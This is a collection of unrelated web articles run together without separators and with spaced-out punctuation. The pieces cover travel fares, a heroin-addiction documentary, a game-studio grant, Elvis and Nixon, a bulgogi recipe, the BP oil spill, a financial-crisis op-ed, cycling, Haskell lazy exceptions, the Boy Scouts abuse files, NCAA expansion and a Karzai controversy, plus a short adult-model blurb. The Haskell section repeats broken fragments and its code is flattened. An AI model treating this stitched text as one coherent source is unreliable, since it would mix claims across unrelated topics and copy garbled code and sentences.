• Be flexible with travel dates .
" That gives you the flexibility to look at some of these dates that may have lower fares .
We tend to see some of the Fridays and Saturdays being the peak days when people are leaving for their vacations , " so earlier in the week is often better for prime tourist destinations , she said .
Fees on Tuesday and Wednesday are going to be less than on Sunday or Friday , Saglie said .
See Farecompare 's surcharge calendar
• Book your airfare and hotel as a package .
" You 're almost always going to save on the total when you book those together as a package rather than booking your airfare and then booking your hotel separately , " Tornatore said .
The hotels and airlines like to unload excess inventory as a bundled package to avoid showing low prices for either , she said .
• Try to avoid extra fees , such as for baggage .
" If you can pack it into a carry - on bag and check less baggage , you 'll avoid those fees that are on top of the increased airfare , " Tornatore said .
" The airlines have been moving in the direction of a la carte pricing for some time , and it's not likely to stop , " said Genevieve Shaw Brown , senior editor at Travelocity .
" Travelers need to concentrate on hotels to get value on their vacations . "
Average daily rates at domestic hotels are slightly lower than in summer 2009 and 14 percent lower than in 2008 , Brown said .
Saglie avoided criticizing the airline industry for finding new ways to charge higher fares .
" It certainly talks to the fact that consumers need to be more aware , " he said .
" It 's more of a fend - for - yourself approach to travel that we 're seeing these days , where the more informed and aware the consumer is , the more money they stand to save when they travel . "
As a bright schoolboy from a loving , middle - class family Ben Rogers was expected to make a success of his life .
Raised in a quiet , picturesque village Ben was a Boy Scout , loved cricket , played in the school orchestra and looked forward to the annual family holiday .
But despite his privileged start in life Ben found himself on the road to ruin , injecting heroin up to four times a day .
During his last months ,
Ben kept a video diary of his drug use and desperate attempts to come off heroin .
Ravaged by the drug , Ben ’s body began to break down : he developed DVT and his veins were rendered so useless he had to inject into his groin .
Despite his family ’s best efforts , Ben could n’t stop .
He was haunted by , and hooked on , heroin .
Ben : Diary of A Heroin Addict charts his lies and manipulation as he mixes his next hit whilst telling his mother Anne he is clean and making a new start .
It reveals Annes anger and tears as Ben loses his fight against the drugs and shows how father Mikes unconditional love continues undiminished as they are forced to deal with their sons addiction .
Director Olly Lambert comments :
It ’s incredibly rare to come across such raw and unflinching footage of a man so close to an abyss .
I was speechless when I first watched it .
I hope the film finishes what Ben had begun : to give people a visceral understanding of the nature of addiction .
It has been a privilege to try and unpick who Ben really was using the intimate legacy hes left behind .
“ I hope to god you look at these videos and see what a mess I got myself into . ”
Ben Rogers .
Silicon Knights , Canadian developer of Too Human , was given a $ 4 million federal grant to help make a AAA game .
While we keep hearing about governments giving tax credits to game development companies , the Canadian government has taken a different tack by offering cash to help create game design jobs and foster a vibrant game community north of the border .
Silicon Knights is located in St. Catharine 's , Ontario , which is just across the border from Buffalo , NY and Niagara Falls .
Silicon Knights released Too Human on the Xbox 360 in 2008 , as well as Metal Gear Solid : The Twin Snakes for the Nintendo Gamecube .
The company currently employs 100 people , but , with this grant , they plan to add over 65 more jobs .
Company president Denis Dyack said that he could n't divulge what game Silicon Knights is currently working on , and that the grant will do much to secure the area as a high - tech hub .
" This is going to benefit Silicon Knights in ways that are profound and long - lasting , " Dyack said .
" We are blown away and we 're happy with the support we 're getting .
It is something that could n't have come at a better time . "
He went on :
" In our industry , you have to be very careful never to announce anything until the right time .
We can only say it 's a next generation title and a high production value game , " Dyack said .
" That 's all we can say . "
The local federal representative for the area , called an MP or Member of Parliament in Canada , Rick Dykstra acknowledged that it might seem strange for taxpayer money to benefit a private company , but that it is legal if there are no competing local companies .
Silicon Knights is the only AAA game developer in the region of Niagara , and the entire province of Ontario for that matter .
" Their growth and their success is very important to our community , " Dykstra said .
" Not only in terms of job creation but also in terms of attracting and retaining the types of highly skilled workers Niagara needs to prosper .
This is n't going to have a negative impact on any other companies in Ontario .
What it 's going to do is build this company up to the point where it 's going to create 65 jobs and longer - term jobs down the road . "
The grant is part of several federal investments in the high - tech field in the area , with funding going to Brock University and Niagara College as well as a recent $ 3 million grant to nGen , the Niagara Interactive Media Generator .
As Walter Sendzik from the St. Catharines - Thorold Chamber of Commerce put it , " We are going to be known as the gaming capital of Canada . "
Source : Welland Tribune
Guns , Elvis , and Nixon
December 21 , 1972
In a five page letter to President Richard Nixon written while traveling on a plane to Washington , Elvis explains he loves his country and wants to give something back and , not being “ a member of the Establishment , ” believes he could reach some people the president ca n’t if the president would only make him a federal agent at - large so he can help fight the war on drugs .
President Nixon and Elvis Presley shaking hands in the Oval Office
( Oliver F. Atkins / White House / The National Archives / EPA / December 21 , 1970 )
Then it ’s time for gifts .
Elvis pulls out the commemorative Colt 45 he had taken from his wall and carried into the White House , to the dismay of the Secret Service .
( “ We ’ve got a little problem here ; Elvis has brought a gun . ” )
He presents it to Nixon .
The commemorative gun is on display at the Nixon Library in Yorba Linda , California .
Makes me wonder what would happen if someone high profile like Jay - Z or Kanye showed up at the oval office with a commemorative gun for Obama : lol :
Read the full article over at the L.A. Times – HERE
I definitely recommend reading the full article .
It has a couple other gun related anecdotes .
I often get requests for busty legends , and Faith Nelson is one of them .
I can safely say her best work was done for Scoreland as you can see with this corset gallery , but she also posed nude for XX - Cel around the time when her nudes were rare .
So yea , enjoy !
Grab it on the App Store .
The Japan Food Addict app is here !
Bulgogi is Korean style stir - fried beef .
It is a staple at Korean restaurants all over the world .
It ’s best served with steamed rice , but would also be good wrapped with lettuce .
Yield : 4 servings Time : 15 minutes Ingredients 3/ 4 lb sliced beef
3 oz sliced carrots
1 onion ( sliced )
2 shiitake mushrooms
1 green pepper ( chopped )
1/4 cup green onions ( chopped ) Spices 2 tbsp sake
1 tbsp gochujang
4 tbsp soy sauce
2 tbsp ground sesame
1 tbsp sugar
1 tbs mirin
1 tbs ground garlic
1 tsp sesame oil Preparation
Put spices and green onion in a big bowl and mix with beef , then add remaining vegetables .
Heat a frying pan over medium heat , add mixture , and cook for 7 to 10 minutes until cooked .
JapanFoodAddict.com : Beef
Rep. Edward Markey said his office was notified the feed of the oil spill will be shut down while BP tries the " top kill " procedure .
[ Updated at 9:20 p.m. ]
BP says it will continue to provide live video feeds of oil gushing from the seabed of the Gulf of Mexico while it attempts to seal the damaged well in a procedure known as " top kill . "
" BP agreed to make the live feed of the top kill attempt available at the request of the President and the National Incident Center , " an administration official told CNN .
Preparations for the procedure are continuing with the expectation that it could be activated on the morning of Wednesday May 26 , 2010 , BP said in a statement Tuesday night .
Throughout the top kill procedure - which may take up to two days to complete - significant changes in the appearance of the flows at the seabed may be expected , BP said .
The changes will not provide a reliable indicator of the progress of the operation as a whole and BP will report on the progress of the operation as appropriate , the company said .
[ Updated at 6:10 p.m. ]
BP told the chairman of the House subcommittee on energy and the environment that it will be killing the live feed video of the spill at the bottom of the Gulf of Mexico while it attempts to seal the well using the " top kill " procedure , Rep. Edward Markey said in a statement .
“ It is outrageous that BP would kill the video feed for the top kill .
This BP blackout will obscure a vital moment in this disaster , ” Markey said in a statement .
“ After more than a month of spewing oil into the Gulf of Mexico , BP is essentially saying to the American people the solution will not be televised . ”
But BP said no decision has been made yet on whether to temporarily suspend live webcam coverage from the sea bed during the operation .
" Any statement that a decision has already been taken to stop the feed is both inaccurate and premature , " BP said in a statement Tuesday afternoon .
“ As we have been throughout our response to this incident , BP remains committed to full transparency in all our actions . ”
Markey 's said BP was expected to terminate the live feed Wednesday , but BP said it 's still considering its opti0ns .
“ We are working extremely closely with multiple agencies across the Government and the Unified Command in considering how best to continue to provide access and information throughout the ‘ top kill ’ procedure .
Over the next few days we will be carrying out a sensitive and complex procedure involving multiple simultaneous operations , and we are in active discussion as to whether the live feed from the sea bed that we have been broadcasting will continue to provide meaningful information through this complicated and unpredictable procedure .
If the Basel requirements had n’t been promulgated as local law in most countries , banks would have had very little incentive to use these techniques to such an extent , reserving them only for “ niche ” purposes .
Instead , they would have kept more direct investments in their assets portfolios .
In that case , the first signs of weakness from some type of assets , like real estate mortgages , would have provided an early signal to financial institutions that it was time to reshuffle their portfolios , and the potential losses of the financial system would have been much lower .
Good regulation should compel banks to disclose fully the primary investment vehicles in their asset portfolios and the exact levels of their liabilities , but leave them free to choose the right level of equity and the types of investments they put in their assets .
Combined with the elimination of the tax distortion mentioned above , this should lead to much better market information about the financial health of banks , forcing the weakest among them to borrow at higher interest rates and to reinforce their equity level against the risk they assume in their portfolios .
Distortions in Mortgage and Real Estate Markets • Special advantages granted to Fannie Mae and Freddie Mac
As Congressman Ron Paul and others noted from the very beginning of the new century , the special credit line and other fiscal privileges granted by the federal government to government - sponsored entities ( falsely seen as private companies ) like Fannie Mae and Freddie Mac amplified the risk of the creation of a real estate bubble that could heavily damage the US financial system when it burst .
These guaranties provided by Washington to GSEs allowed them to borrow money at rates close to those obtained by the federal government itself for its own bonds , giving Fannie and Freddie an unfair advantage over purely private banks .
Worse , special accounting rules granted them by their supervising authority ( the HUD ) , allowed them not to fully disclose their off - balance operations and to over - leverage their balance and off - balance liabilities 80 times more than their equity .
Had Fannie and Freddie been under the common law of private institutions , they could n’t have borrowed so much money at such low rates to finance such risky operations .
No financial institution should be granted special rights .
Fannie and Freddie must be liquidated and abolished .
Loan refinancing must be turned into a purely private business , as it is in many countries .
• Special constraints placed on Fannie Mae and Freddie Mac
All these advantages provided to Fannie and Freddie were not granted with no strings attached .
Fannie and Freddie , since 1992 , were forced to contribute to the refinancing of loans attributed to low - revenue families .
The percentage of these loans was gradually increased , by law , from 40 % in 1992 to 56 % in 2008 . ( 7 )
Since an internal scandal put pressure on the two GSEs , threatening their existence through congressional action , they tried
( successfully ) to justify their privileges with a huge increase in the refinancing of loans for low - income families from 2004 to 2007 .
A press investigation showed that they did n’t do it directly , but mostly indirectly , through the purchase of large amounts of bonds collateralized by risky loans made by other institutions .
Congressional testimony showed that Fannie ’s and Freddie ’s managers , though aware of the unorthodox nature of their actions with regard to the risk level their companies were bearing , could n’t resist the political pressure to “ take more loans . ”
These “ juggernaut policies ” contributed to the over - leveraging of GSE balance sheets mentioned above .
This shows how harmful it can be to maintain so - called private companies under political pressure because of the privileges they are granted : politicians tend to subordinate economic imperatives to their political agenda .
No company should be forced by the state to engage in dangerous behaviours .
• Community Reinvestment Act
The CRA was a law aimed at preventing “ discrimination ” against visible minorities by lending institutions .
CRA provisions forced banks to lower their lending standards toward these minorities .
CRA loan delinquency rates have not been much higher than the rates for other loans , and this gives momentum to CRA defenders .
But the drawbacks of the CRA were hidden elsewhere .
The law submitted bank mergers and acquisitions to the oversight of several agencies with the power to block the deals if they were not “ CRA compliant . ”
This forced small banks that kept their good habits of “ serious lending ” ( there were many of them ) to remain small .
It also forced bigger banks that wanted to benefit from the 1994 and 1999 deregulation laws ( Riegle - Neale and Gramm - leach - Bliley ) to build great nationwide networks , in order to lower their loans ’ underwriting standards .
These deregulations should have been economically positive , since they repealed older texts from the 1920s and 30s that prevented banks from practicing accurate risk diversification .
However , the reinforcement of CRA regulations in 1995 turned them into risky moves , because banks that wanted to take advantage of them could only do so by adopting riskier lending behaviours .
Since the purportedly large differences in lending approval rates between communities have been proven less significant by several studies , debunking the myth of “ racist banks . ” these CRA provisions should be repealed .
Banks should be free to select mortgage applicants according to their own rating standards .
• Smart Growth Policies and similar land - use regulatory restrictions
Although very few observers have noted this , the real estate bubble was highly uneven geographically throughout the USA ( and Canada , too ) .
In fact , price escalation was huge in about a dozen states , but nearly nonexistent in others , even if there was a huge demand in those states too .
The three fastest - growing areas of the USA — Atlanta , Dallas , and Houston — did n’t experience the same real estate bubble as big cities like Los Angeles , or midsized ones like Portland .
If demand had been the sole factor behind real estate price hikes , Houston and Atlanta should have been the most expensive metro areas in the country .
They remained among the cheapest .
So the bubble should also be explained from the supply side of the equation .
The different behaviours between these two kinds of markets arise from land - use regulations .
The Brookings Institute has classified metro area regulations into two categories : prescriptive regulations , which make it difficult for land owners to turn non-constructible land into land that can be developed ; and conversely , responsive regulations , which are aimed at keeping enough land available to meet demand for new housing units .
The housing bubble basically only occurred in areas with prescriptive regulations , ( 8 ) generally referred to as “ smart growth policies , ” or , in two cases ( Arizona and Nevada ) , in areas where local power actually owns the land and decided to reduce land sales to developers in order to raise their financial revenues through higher land prices .
The total value of originated mortgages increased from $ 5,200 billion in 2000 to $ 12,000 billion at the peak of the bubble .
More than 80 % of the mortgage escalation occurred in areas with “ smart growth ” and equivalent policies .
This means that if the whole country had enacted the same land - use regulations as Atlanta or Houston , the total exposure of the financial system to mortgage risk would have been reduced by about $ 4,000 billion .
( 9 ) This would certainly have made the current crisis much less severe .
But there is more .
If the whole country had been a “ no bubble can even get started ” area , as Nobel Prize - winner Paul Krugman formulated it , the behaviour of lenders and borrowers would have been completely different .
It would have been much more difficult to persuade borrowers to jump recklessly onto the easy credit bandwagon , and lenders would have found it much less interesting to take homes as guarantees for high - risk loans .
This would have avoided many “ borrow against equity ” mortgages aimed , not at purchasing a home , but at using continually growing home prices to finance flat screens , SUVs , and other goodies .
Growth rates in the USA would thus have been less spectacular , but also less artificial .
When studied in detail , environmental and agricultural concerns against urban surface expansion , a .k.a. “ sprawl , ” appear to be widely exaggerated .
Smart growth policies , aimed at providing a government response to these exaggerated fears , have produced extremely harmful unintended consequences , and imperceptible benefits .
Smart growth policies must be repealed .
This can be easily justified by the fact that most are clearly violating property rights , whatever the Supreme Court has said in recent rulings .
Conclusion : Restore Markets !
Markets are imperfect because human beings are .
All the state interventions in free market mechanisms described above were supposed to bring corrections to unavoidable market imperfections .
They were supposed to provide us with safer banks , better access to consumer goods for the poor , better - performing companies and economies , better use of space , and better social side effects .
None of the intended goals of these interventions have been achieved .
But by destroying the “ natural ” defences of markets against failure , they wrought havoc on the world economy .
It ’s time for politicians to ask themselves why state regulations of land , finance and money failed so miserably , and if we should not replace them with a few market - based mechanisms that would be more efficient in achieving their stated goals .
Some time ago , my friend – the filmmaker and fellow cycling advocate – Mike Rubbo asked me if I would like to engage in international collaboration on two videos that highlight women cyclists who – in Mike ’s words – choose different bikes for different hikes .
So I set out to find a woman who would fit the profile – somebody who wears the lycra racing gear ( and a helmet ) on weekends , but rides a stylish sit - up bicycle during the week ( sans helmet ) .
Yvonne Bambrick – the Executive Director for the Toronto Cyclists Union – put me in touch with the passionate Toronto cyclist Briana Illingworth .
Briana is a fascinating person and was a perfect match because her love for cycling extends not only on her commute to work – but in her job itself .
Briana is a Transportation Policy and Planning Advisor for Metrolinx – the provincial organization setup to “ champion , develop and implement an integrated transportation system [ in the Greater Toronto area ] that enhances prosperity , sustainability and quality of life ” .
Briana ’s focus is on Active Transportation and her vision is a community where people have the option to get around on bicycles without any special clothing or equipment .
I took footage of Briana on a weekend in her racing gear and on a weekday in her regular clothes without a helmet .
In the film , Briana shows us that you do n’t always need to be in a hunched down position on a racing bicycle .
Taking it slow , on a sit - up bicycle is a more comfortable and safer way to get around the city .
Well ahead of me , Mike finished his film – Bike it or Not – featuring Jill Charlton .
The focus of Mike ’s film is Australia ’s mono culture of sport cycling as opposed to the European slow , sit - up style cycling .
Speaking personally , I can say that getting out on my bike is the most refreshing part of my day .
It clears my mind , provides me some exercise , gets me to my destination efficiently , and it damn near does n’t cost a thing .
In North America , cycling is dominated by men – in the US there are at least 2 men for every woman cyclist .
Compare that to the Netherlands , where 55 % of riders are women .
An increase in the percentage of women cyclists is usually a sign that the conditions for cycling are improving .
If all men and women considered using a sit - up style bicycle in regular clothes like Briana , it would have a traffic - calming effect – making our neighbourhoods safer and more livable .
A truly successful cycling community is one where everybody rides bikes – men , women , children and the elderly .
If you know someone who has considered using their bicycle for transportation but was too intimidated in our car - dominated North American cities , then please send them these videos to help encourage them to join the slow cycling movement .
James D. Schwartz is the editor of The Urban Country .
You can contact James at james.schwartz@theurbancountry.com .
Related Articles :
A 4 - inch crucifixion - style nail dating from the time of Jesus has been discovered in an ornate box at a fort that may have been a stronghold of knights who occupied Jerusalem during the Crusades , The Daily Mirror reports .
The Knights Templar , featured in The Da Vinci Code , conquered the Holy Lands and claimed to be guardians of the Holy Grail , the cross and other relics .
The iron nail , similar to the type used in thousands of crucifixions across the Roman Empire , was found during excavations of the fort on the tiny island of Ilheu de Pontinha , off the Portuguese island of Madeira .
The Mirror says the nail is smooth , indicating that it had been handled by many people over a long period of time .
The newspaper quotes Christopher Macklin of the Knights Templar of Britannia as calling last summer 's find " momentous . "
He said evidence the nail had been handled a lot " indicates it was of great interest to many people " and that he believes the original Knights Templar thought it was a genuine artifact from Jesus ' crucifixion .
( Posted by Doug Stanglin )
Consider the following piece of code :
import Prelude hiding ( catch ) import Control .
Exception main :: IO ( ) main = do t <- safeCall unsafeCall t putStrLn " Done . " safeCall :: IO String safeCall = do return always Fails `catch` errorHandler -- always Fails = throw ( ErrorCall " Oh no ! " ) always Fails = error " Oh no ! " errorHandler :: SomeException -> IO String errorHandler e = do putStrLn " Caught " return " Ok. " errorHandler_ e = errorHandler e >> return ( ) unsafeCall :: String -> IO ( ) unsafeCall = putStrLn
What might you expect the output to be ?
A straightforward transcription to Python might look like :
def main ( ) : t = safeCall ( ) unsafeCall (t ) print " Done " def safeCall ( ) : try : return always Fails ( ) except : return errorHandler ( ) def always Fails ( ) : raise Exception ( " Oh no ! " ) def errorHandler ( ) : print " Caught . " return " Ok. " def unsafeCall ( output ) : print output
and anyone with a passing familiarity with the any strict language will say , " Of course , it will output : "
Caught .
Ok. Done .
Of course , lazy exceptions ( which is what error emits ) are n't called lazy for no reason ; the Haskell code outputs :
*** Exception : Oh no !
What happened ?
Haskell was lazy , and did n't bother evaluating the pure insides of the IO return always Fails until it needed it for unsafeCall , at which point there was no more catch call guarding the code .
If you do n't believe me , you can add a trace around always Fails .
You can also try installing errorHandler_ on unsafeCall .
What is the moral of the story ?
Well , one is that error is evil , but we already knew that ...
You may install exception handlers for most IO - based errors the obvious way .
( If we had replaced return always Fails with always Fails , the result would have been the strict one . )
You may not install exception handlers for errors originating from pure code , since GHC reserves the right to schedule arbitrarily the time when your code is executed .
with , the result would have been the strict one . )
You may not install exception handlers for errors originating from pure code , since GHC reserves the right to schedule arbitrarily the time when your code is executed .
If pure code is emitting exceptions and you would like it to stop doing that , you 'll probably need to force strictness with $!
deepseq or rnf , which will force GHC to perform the computation inside your guarded area .
As my readers point out , a good way to think about this is that the call is not what is exceptional , the structure is .
or , which will force GHC to perform the computation inside your guarded area .
As my readers point out , a good way to think about this is that the call is not what is exceptional , the structure is .
If you are getting an imprecise exception from pure code , but can't figure out where , good luck !
I do n't have a good recipe for figuring this out yet .
( Nudge to my blog readers . )
America 's Scouting movement is fighting to keep secret thousands of " perversion files " on suspected child molesters after it was ordered to pay record damages over the sexual abuse of a former Scout .
In a growing scandal threatening to rival the crisis hitting the Roman Catholic church , the Boy Scouts of America has been accused of covering up decades of child abuse in order to protect the reputation of what is now a billion - dollar organisation .
Last week , a jury in Oregon made the largest punitive damages award to a single plaintiff in a child abuse case in the US by ordering the Scouts to pay $ 18.5 m ( £ 12 m ) to Kerry Lewis , who was repeatedly assaulted by a former assistant scoutmaster , Timur Dykes , in the 1980s .
Dykes had admitted to a superior in the Scouts that he had abused boys , but was allowed to remain in the organisation and is alleged to have sexually assaulted several other children who are also taking legal action .
The judge in the case overruled the Scouts ' attempts to keep the jury from seeing about 1,200 files kept by the organisation on suspected paedophiles .
Kelly Clark , Lewis 's lawyer , told the jury that while the files were often used to remove child abusers from the Scouting movement , many were allowed to remain in the organisation .
He said that the Scouts rarely alerted the police and when they did , the movement asked the authorities to avoid publicity .
Clark told the jury that the Scouting leadership had been " reckless and outrageous " in failing to warn parents and boys about the problem .
The files shown to the jury were not made public and are just a small part of what is believed to be a cache of as many as 6,000 held at the Scouts ' headquarters in Texas , dating back to the 1920s .
Lawyers for alleged sexual abuse victims are suing to have all the files made public at a hearing next month .
If that happens , it is likely to prove a severe blow to an organisation that is already at the centre of controversy over a bar on atheists and gay people .
Membership stands at about 3 million , but has been dropping for more than a decade , in part because of the controversies over discrimination .
Clark said the scale of the award to Lewis reflects a heightened awareness of sexual crimes against children because of the recent revelations about the Catholic church .
But he also said that the jury was shocked by the existence of what in court were called the " perversion files " .
" We said they had 75 years of secret files about paedophiles , and that 's the way the evidence came in .
I think that fact in itself was just staggering to the jury , " he said .
" They had a regular practice of placing guys on probation and then they would allow them to continue to be active in Scouting , not unlike some of what you saw in the Catholic church . "
Dykes confessed his abuse in 1983 to the local Scouts co-ordinator , who also happened to be a Mormon bishop , but was allowed to continue working with the Scouts .
Lewis said he was molested by Dykes over the following two years .
The Mormon church settled with Lewis and seven other victims of Dykes more than a year ago .
Clark said the Scouts shared information from the files when requested to do so by the police , but it almost never took the initiative in submitting a case to the authorities , even where there was credible evidence of abuse .
" The routine was that they would deal with it internally , " said Clark .
" They would place the paedophile on their list of ineligible volunteers and if it was dropable they would drop it , and it was done .
There were numerous examples of Scouting executives saying ' let 's keep this quiet , he 's out of Scouting now , so we do n't need to do any more about it . '
There was definitely a misguided sense of priorities . "
Even where the police did become involved , the Scouts sought to minimise the damage to the organisation .
" We saw numerous examples of the Scouts writing to law enforcement saying ' it would be best for the good of Scouting if this could avoid being made too public . '
Law enforcement was almost complicit in this saying ' we 'll do our best to keep this quiet because we value the work of the Boy Scouts , ' " said Clark .
The Scout leadership said it was seeking to keep the files secret to protect the privacy of the victims and to guard against being sued for false accusations .
It said it was " deeply saddened " by the abuse of Lewis , but would not comment further on the case because of continuing litigation .
" The Boy Scouts of America has a rigorous , nationwide system of checks and balances , in accordance with local laws , which keeps out of the programme those individuals who should not be leading youth , " it said .
But Patrick Boyle , author of Scout 's Honour : Sexual Abuse in America 's Most Trusted Institution , said the Scout leadership lost sight of its real purpose in dealing with paedophiles .
" They 've behaved like a corporation with an embarrassing product defect that they do n't want to acknowledge .
The Scouts were minimising the extent of the problem within their organisation and in large part discrediting their own Boy Scout victims and trying to hide the product defect , so to speak , by not letting on how many cases they have , misleading people into thinking they did n't really know how many cases they have , they did n't have a file system .
And then fighting tooth and nail in court to keep it secret , " he said .
" They have also been very heavy handed with the victims , not apologising . "
Scouts ' dishonour
The Boy Scouts of America organisation has been at the centre of nearly three decades of controversy ranging from out - of - court settlements with victims of childhood sexual abuse to its bar on non-believers and gay people .
Although Kerry Lewis won the largest punitive damages to date ( $ 18.5 m ) awarded over sexual molestation , the Scouts in the US have settled about 60 similar cases out of court over recent years .
Until last week 's judgment , the Texas - based Scout movement had previously fought off several court actions , including an attempt to overturn its policy that atheists and agnostics who were not prepared to swear allegiance to God could not join .
It also beat off legal attempts to force it to drop an effective bar on openly gay members on the grounds that being homosexual is not consistent with the organisation 's requirement to be " morally straight " .
The Girl Scouts of America , a separate organisation , permits members to submit a word other than God when reciting its oath and has no restrictions based on sexual orientation .
Some critics have accused the Boy Scouts of losing touch with its original purpose as it has evolved into a an organisation which in some ways resembles a large corporation , with close to $ 900 m in assets , including a $ 45 m art collection and a large property portfolio .
" Never doubt that a small group of thoughtful , committed citizens can change the world ; indeed , it 's the only thing that ever has . "
Margaret Mead
When the history ...
INDIANAPOLIS --
The NCAA hopes to expand the men's basketball tournament from 65 to 68 teams beginning next year , and announced a new , $ 10.8 billion broadcasting deal with CBS and Turner Broadcasting on Thursday that will allow every game to be shown live for the first time .
The three - team expansion is much more modest than 80 - and 96 - team proposals the NCAA outlined just a few weeks ago at the Final Four .
The move coincides with the new , 14 - year broadcasting arrangement that interim NCAA president Jim Isch said will provide an average of $ 740 million to its conferences and schools each year .
The NCAA badly wanted every tourney game broadcast live .
" It was a goal from the very , very beginning , and I believe it's what our memberships want and it's what our fans want across the country , " Isch said .
" I think without question , it was one of the driving factors in our position and why CBS and Turner make such great partners . "
The NCAA said the Division I Men's Basketball Committee unanimously passed the proposal and it will be reviewed by the Board of Directors next Thursday .
" We are very comfortable with 68 , that 's what the deal is based on and it meets all our financial needs and programming needs , " said Sean McManus , president of CBS News and Sports .
The men's tournament last expanded in 2001 , adding one team to the 64 - team field that was set in 1985 .
Talk of tweaking March Madness again generated a lot of chatter from fans worried the competition would be watered down and those who feared the additional bracket guesswork needed to predict a winner .
The National Association of Basketball Coaches has long advocated expansion , citing the fact that while the number of Division I teams has expanded greatly over the last quarter - century .
" As coaches , we 've been strongly in favor of expansion , " NABC executive director Jim Haney said .
" I think 68 would be comfortably welcomed by all . "
Syracuse coach Jim Boeheim , who favored expansion , said the proposal was " better than nothing . "
" As a coach I 'd like to see more people get in , but 68 is a good step and the easiest way to have the least amount of turmoil , " Boeheim said .
" There 's really no way to do a little bit bigger expansion .
You can't expand by eight , 10 .
There 's no way to figure that out .
This is the easiest way , and hopefully down the road there will be a bigger expansion . "
Duke coach Mike Krzyzewski agreed .
" With the addition of three more teams to the field , the basic structure of the tournament will not be impacted significantly in the foreseeable future , " he said .
" As a coach , I am very pleased with this result . "
However , Connecticut coach Jim Calhoun was less enthusiastic .
He pointed to this year 's tournament , which included deep runs by Cornell , Northern Iowa , Xavier and national runner - up Butler .
" I have a tough time seeing why we have to change a concept that has been so good , " Calhoun said .
" This year , the parity was incredible .
If you have something that has become magical and what has enhanced it is not more games , but the Butlers and the parity .
Those things are what have done it .
George Mason .
It 's been proven time and again . "
Less than four weeks ago , turning the NCAA 's signature event into a 96 - team field seemed like all but a done deal .
During the Final Four , NCAA vice president Greg Shaheen talked extensively about plans to go to 96 , saying the three - week event would start two days later and eliminate the play - in game .
But more games would have been added to Week 2 , and that caused concerns about how much class time the athletes would miss .
Shaheen also cautioned then that nothing had been decided .
Any move hinged on the NCAA 's $ 6 billion , 11 - year television deal with CBS Sports , which has broadcast championship games since 1982 .
The deal , signed in 1999 , had a mutual opt - out until July 31 , and the NCAA took it amid speculation that ESPN might become a partner in one of the most popular and lucrative tournaments in sports .
" We made an aggressive bid and believe our combination of TV distribution , digital capabilities , season - long coverage and year - round marketing would have served the interests of the NCAA and college fans very well , " ESPN said in a statement .
" We remain committed to our unparalleled coverage of more than 1,200 men's and women 's college basketball games each season . "
The NCAA 's agreement with CBS and Atlanta - based Turner Broadcasting System Inc. runs from 2011 through 2024 .
It means every game next March will be shown live -- on CBS , TBS , TNT or truTV -- for the first time in the tournament 's 73 - year history .
Next year , everything through the second round will be shown nationally on the four networks .
CBS and Turner , an entity of Time Warner Inc. , will split coverage of the regional semifinal games , while CBS will retain coverage of the regional finals , the Final Four and the championship game through 2015 .
Beginning in 2016 , coverage of the regional finals will be split by CBS and Turner ; the Final Four and the championship game will alternate every year between CBS and TBS .
Under the agreement , the NCAA and CBSSports.com will again provide live streaming video of games , although Turner secured rights for any video player it develops .
" This is a landmark deal for Turner Broadcasting and we 're extremely pleased to begin a long - term relationship with the NCAA and our partners at CBS and to have a commitment that extends well into the next decade , " said David Levy , president of sales , distribution and sports for Turner Broadcasting .
Some fans may find themselves scrambling to find their favorite teams , though .
McManus acknowledged late Thursday afternoon that if Kentucky , for instance , has a game scheduled on truTV , it wo n't be shown on CBS -- even in the team 's home city .
How critical is the deal to the NCAA ?
More than 95 percent of the governing body 's total revenue comes from the broadcast rights to the men's basketball tournament .
And it clearly was important to New York - based CBS .
McManus said the " new strategic partnership " was a core asset and a profitable one , although he hinted that the annual payments of $ 700 million over the last three years of the original deal were a load .
" We were prepared to do the last three years of the current deal ; it was no secret that those three years would be very challenging , " he said .
" But this deal was based on the NCAA coming to us saying that we would like a new deal in place . "
A 96 - team field likely would have enveloped the 32 - team NIT , the NCAA 's other , independently run season - ending tournament .
Ohio State athletic director Gene Smith , the incoming tournament committee chair , was ecstatic that he would n't have to manage a 96 - team field .
" It was thought that 96 teams would generate more money to support the NCAA 's many sports and initiatives , " Smith said .
" But we were all able to come to an understanding that gives us the support without adding that many teams . "
The proposal is strictly for the men's tournament .
Another NCAA committee is looking at whether to expand the women 's tournament or keep it in the current format .
Information from The Associated Press was used in this report .
The war of words between the former deputy head of the UN mission to Afghanistan and the country 's president escalated last night when Peter Galbraith suggested that Hamid Karzai's " mental stability " was in question and that he has a substance abuse problem .
Galbraith , the US diplomat who worked for the UN in Kabul until last year , made his remarks live on US television .
His comments come as the White House considers withdrawing an invitation for Karzai to meet Barack Obama in Washington next month .
Galbraith , the former UN deputy special representative in Afghanistan , was responding to allegations first made by Karzai last Thursday that the international community and Galbraith in particular had been responsible for " massive fraud " during last year 's disastrous presidential election .
" He 's prone to tirades , he can be very emotional , act impulsively , " Galbraith said on MSNBC television .
" In fact some of the palace insiders say that he has a certain fondness for some of Afghanistan 's most profitable exports . "
When asked whether he was saying Karzai had a substance abuse problem , Galbraith said there were " reports to that effect " .
" This continued tirade raises questions about his mental stability and frankly this has been of concern to diplomats in Kabul . "
Siamak Hirawi , a presidential spokesman , rejected Galbraith 's claims and said the palace condemned the US diplomat 's remarks .
" What Mr Galbraith said is far away from the principle of diplomacy and it simply confirms what President Karzai was saying about [ Galbraith 's ] involvement in corruption . "
A White House spokesman , Robert Gibbs , has said the US will consider cancelling Karzai 's invitation to meet Obama in Washington on 12 May in the light of any " further remarks " the Afghan president makes .
The foreign secretary , David Miliband , has intervened in the row , saying that " malign suggestions " the UK was involved in interfering with the elections were " completely without foundation " .
Karzai's claims that foreigners were responsible for " very widespread fraud " during the election were first made shortly after Barack Obama made a fleeting visit to Kabul last week .
The US secretary of state , Hillary Clinton , tried to defuse the row during a phone call with Karzai on Friday , but he went on to repeat his claims to Afghan MPs and rhetorically threatened to " join the Taliban " if foreigners continued to interfere in the country 's affairs .
On Sunday , during a trip to Kandahar , he told the BBC that he stood by his allegations despite the furore they had created .
There is some evidence that by sticking up for Afghan sovereignty he has gained some kudos among ordinary Afghans , but many MPs and members of the country 's establishment have been horrified to see him jeopardise the critical Afghan - US relationship .
The controversy has emboldened his enemies to bring to public attention two issues that hitherto had been confined to the Kabul diplomatic rumour mill : Karzai 's mental health and his alleged use of drugs .
Last week Abdullah Abdullah , the opposition leader who polled second in last year 's election , said Karzai 's behaviour recently had been " erratic " and that " as a former colleague and doctor I think this is beyond a normal attitude " .
